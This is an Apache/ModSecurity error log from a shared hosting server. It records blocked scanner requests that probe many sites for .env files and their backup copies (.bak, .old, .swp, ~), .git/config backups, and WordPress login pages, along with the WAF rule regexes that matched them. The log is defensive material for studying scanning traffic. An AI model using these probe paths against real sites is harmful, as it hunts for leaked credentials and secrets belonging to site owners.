[Tue May 26 14:48:41.555078 2026] [security2:error] [pid 648203:tid 648407] [client 5.255.125.104:52778] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahVlcbEQDDtxJNiDrdTbZwAAAM8"]
[Tue May 26 14:48:41.555107 2026] [security2:error] [pid 648203:tid 648373] [client 5.255.125.104:52766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahVlcbEQDDtxJNiDrdTbagAAAK0"]
[Tue May 26 14:48:41.555205 2026] [security2:error] [pid 648203:tid 648454] [client 5.255.125.104:52842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahVlcbEQDDtxJNiDrdTbaQAAAP4"]
[Tue May 26 14:48:41.555296 2026] [security2:error] [pid 648203:tid 648420] [client 5.255.125.104:52840] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahVlcbEQDDtxJNiDrdTbaAAAANw"]
[Tue May 26 14:48:41.555444 2026] [proxy:error] [pid 648203:tid 648422] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.555492 2026] [proxy_http:error] [pid 648203:tid 648422] [client 5.255.125.104:52874] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.555499 2026] [security2:error] [pid 648203:tid 648390] [client 5.255.125.104:52818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahVlcbEQDDtxJNiDrdTbZQAAAL4"]
[Tue May 26 14:48:41.555572 2026] [proxy:error] [pid 648203:tid 648404] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.555605 2026] [proxy_http:error] [pid 648203:tid 648404] [client 5.255.125.104:52680] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.556092 2026] [proxy:error] [pid 648203:tid 648422] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.556124 2026] [proxy_http:error] [pid 648203:tid 648422] [client 5.255.125.104:52874] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.556853 2026] [security2:error] [pid 648203:tid 648410] [client 5.255.125.104:52852] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahVlcbEQDDtxJNiDrdTbcAAAANI"]
[Tue May 26 14:48:41.556939 2026] [proxy:error] [pid 648203:tid 648350] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.557013 2026] [proxy_http:error] [pid 648203:tid 648350] [client 5.255.125.104:52686] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.557135 2026] [security2:error] [pid 648203:tid 648459] [client 5.255.125.104:52892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahVlcbEQDDtxJNiDrdTbbgAAAQM"]
[Tue May 26 14:48:41.557676 2026] [proxy:error] [pid 648203:tid 648389] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.557726 2026] [proxy_http:error] [pid 648203:tid 648389] [client 5.255.125.104:52734] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.557735 2026] [security2:error] [pid 648203:tid 648338] [client 5.255.125.104:52754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahVlcbEQDDtxJNiDrdTbdAAAAIo"]
[Tue May 26 14:48:41.557900 2026] [proxy:error] [pid 648203:tid 648350] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.557961 2026] [proxy_http:error] [pid 648203:tid 648350] [client 5.255.125.104:52686] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.558205 2026] [proxy:error] [pid 648203:tid 648420] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.558260 2026] [proxy_http:error] [pid 648203:tid 648420] [client 5.255.125.104:52912] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.558356 2026] [security2:error] [pid 648203:tid 648341] [client 5.255.125.104:52794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahVlcbEQDDtxJNiDrdTbdgAAAI0"]
[Tue May 26 14:48:41.558362 2026] [proxy:error] [pid 648203:tid 648407] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.558402 2026] [proxy_http:error] [pid 648203:tid 648407] [client 5.255.125.104:52812] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.558485 2026] [proxy:error] [pid 648203:tid 648389] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.558521 2026] [proxy_http:error] [pid 648203:tid 648389] [client 5.255.125.104:52734] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.558563 2026] [security2:error] [pid 648203:tid 648342] [client 5.255.125.104:52746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahVlcbEQDDtxJNiDrdTbdwAAAI4"]
[Tue May 26 14:48:41.559080 2026] [proxy:error] [pid 648203:tid 648420] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.559123 2026] [proxy_http:error] [pid 648203:tid 648420] [client 5.255.125.104:52912] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.559204 2026] [security2:error] [pid 648203:tid 648396] [client 5.255.125.104:52844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahVlcbEQDDtxJNiDrdTbbwAAAMQ"]
[Tue May 26 14:48:41.559310 2026] [security2:error] [pid 648203:tid 648431] [client 5.255.125.104:52902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahVlcbEQDDtxJNiDrdTbbQAAAOc"]
[Tue May 26 14:48:41.559316 2026] [proxy:error] [pid 648203:tid 648407] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.559374 2026] [proxy_http:error] [pid 648203:tid 648407] [client 5.255.125.104:52812] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.560454 2026] [security2:error] [pid 648203:tid 648346] [client 5.255.125.104:52806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahVlcbEQDDtxJNiDrdTbdQAAAJI"]
[Tue May 26 14:48:41.561234 2026] [security2:error] [pid 648203:tid 648356] [client 5.255.125.104:52890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahVlcbEQDDtxJNiDrdTbawAAAJw"]
[Tue May 26 14:48:41.561715 2026] [security2:error] [pid 648203:tid 648440] [client 5.255.125.104:52830] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahVlcbEQDDtxJNiDrdTbeAAAAPA"]
[Tue May 26 14:48:41.691081 2026] [security2:error] [pid 648203:tid 648349] [client 216.26.230.60:47847] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlcLEQDDtxJNiDrdTbQQAAAJU"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:41.760064 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.5:27808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/config/.env"] [unique_id "ahVlcbEQDDtxJNiDrdTbfQAAALE"]
[Tue May 26 14:48:41.911403 2026] [security2:error] [pid 648203:tid 648363] [client 74.249.173.207:2571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVlcbEQDDtxJNiDrdTbggAAAKM"]
[Tue May 26 14:48:42.136427 2026] [security2:error] [pid 648203:tid 648444] [client 64.89.163.250:65532] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahVlcrEQDDtxJNiDrdTbigAAAPQ"]
[Tue May 26 14:48:42.207858 2026] [proxy:error] [pid 648203:tid 648432] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:42.207917 2026] [proxy_http:error] [pid 648203:tid 648432] [client 5.255.125.104:52892] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:42.208574 2026] [proxy:error] [pid 648203:tid 648432] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:42.208608 2026] [proxy_http:error] [pid 648203:tid 648432] [client 5.255.125.104:52892] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:42.312298 2026] [security2:error] [pid 648203:tid 648325] [remote 54.38.29.86:60680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVlcrEQDDtxJNiDrdTbiQAA33k"]
[Tue May 26 14:48:42.689229 2026] [security2:error] [pid 648203:tid 648323] [remote 45.32.67.165:46762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVlcrEQDDtxJNiDrdTbngAAwnc"]
[Tue May 26 14:48:43.771738 2026] [security2:error] [pid 648203:tid 648425] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlc7EQDDtxJNiDrdTbvgAAAOE"]
[Tue May 26 14:48:43.838451 2026] [security2:error] [pid 648203:tid 648447] [client 216.26.238.198:64075] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlcrEQDDtxJNiDrdTboAAAAPc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:44.754566 2026] [ssl:error] [pid 648203:tid 648459] [client 3.233.59.216:14800] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname powersociety.org.in.svijaykumar.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:48:45.245880 2026] [security2:error] [pid 648203:tid 648414] [client 49.13.24.81:58078] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVldLEQDDtxJNiDrdTb9wAAANY"], referer: https://thegoodsporting.com
[Tue May 26 14:48:45.616055 2026] [security2:error] [pid 648203:tid 648425] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVldbEQDDtxJNiDrdTcDAAAAOE"]
[Tue May 26 14:48:45.953971 2026] [security2:error] [pid 648203:tid 648440] [client 216.26.234.56:36667] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVldLEQDDtxJNiDrdTb_QAAAPA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:46.627542 2026] [security2:error] [pid 648203:tid 648240] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.landsonlogistics.com"] [uri "/*update.cgi*"] [unique_id "ahVldrEQDDtxJNiDrdTcQQAA3SQ"]
[Tue May 26 14:48:46.628424 2026] [security2:error] [pid 648203:tid 648240] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env"] [unique_id "ahVldrEQDDtxJNiDrdTcRAAA3SQ"]
[Tue May 26 14:48:46.770398 2026] [security2:error] [pid 648203:tid 648221] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend/.env"] [unique_id "ahVldrEQDDtxJNiDrdTcVgAArBE"]
[Tue May 26 14:48:46.772602 2026] [security2:error] [pid 648203:tid 648246] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.docker/.env"] [unique_id "ahVldrEQDDtxJNiDrdTcXAAArCo"]
[Tue May 26 14:48:46.774087 2026] [security2:error] [pid 648203:tid 648225] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVldrEQDDtxJNiDrdTcXgAArBU"]
[Tue May 26 14:48:46.914027 2026] [security2:error] [pid 648203:tid 648255] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env"] [unique_id "ahVldrEQDDtxJNiDrdTcaAAA7TM"]
[Tue May 26 14:48:47.063073 2026] [security2:error] [pid 648203:tid 648253] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.backup"] [unique_id "ahVld7EQDDtxJNiDrdTcbQABADE"]
[Tue May 26 14:48:47.063538 2026] [security2:error] [pid 648203:tid 648259] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.bak"] [unique_id "ahVld7EQDDtxJNiDrdTcbgABADc"]
[Tue May 26 14:48:47.064021 2026] [security2:error] [pid 648203:tid 648262] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/.env.php"] [unique_id "ahVld7EQDDtxJNiDrdTcegABADo"]
[Tue May 26 14:48:47.064602 2026] [security2:error] [pid 648203:tid 648260] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.old"] [unique_id "ahVld7EQDDtxJNiDrdTceQABADg"]
[Tue May 26 14:48:47.195664 2026] [security2:error] [pid 648203:tid 648427] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVldrEQDDtxJNiDrdTcUAAAAOM"]
[Tue May 26 14:48:47.214178 2026] [security2:error] [pid 648203:tid 648249] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env~"] [unique_id "ahVld7EQDDtxJNiDrdTchwAAnC0"]
[Tue May 26 14:48:47.217064 2026] [security2:error] [pid 648203:tid 648286] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.swp"] [unique_id "ahVld7EQDDtxJNiDrdTchQAAnFI"]
[Tue May 26 14:48:47.360248 2026] [security2:error] [pid 648203:tid 648292] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config.bak"] [unique_id "ahVld7EQDDtxJNiDrdTclgAAoFg"]
[Tue May 26 14:48:47.362099 2026] [security2:error] [pid 648203:tid 648277] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config.old"] [unique_id "ahVld7EQDDtxJNiDrdTclwAAoEk"]
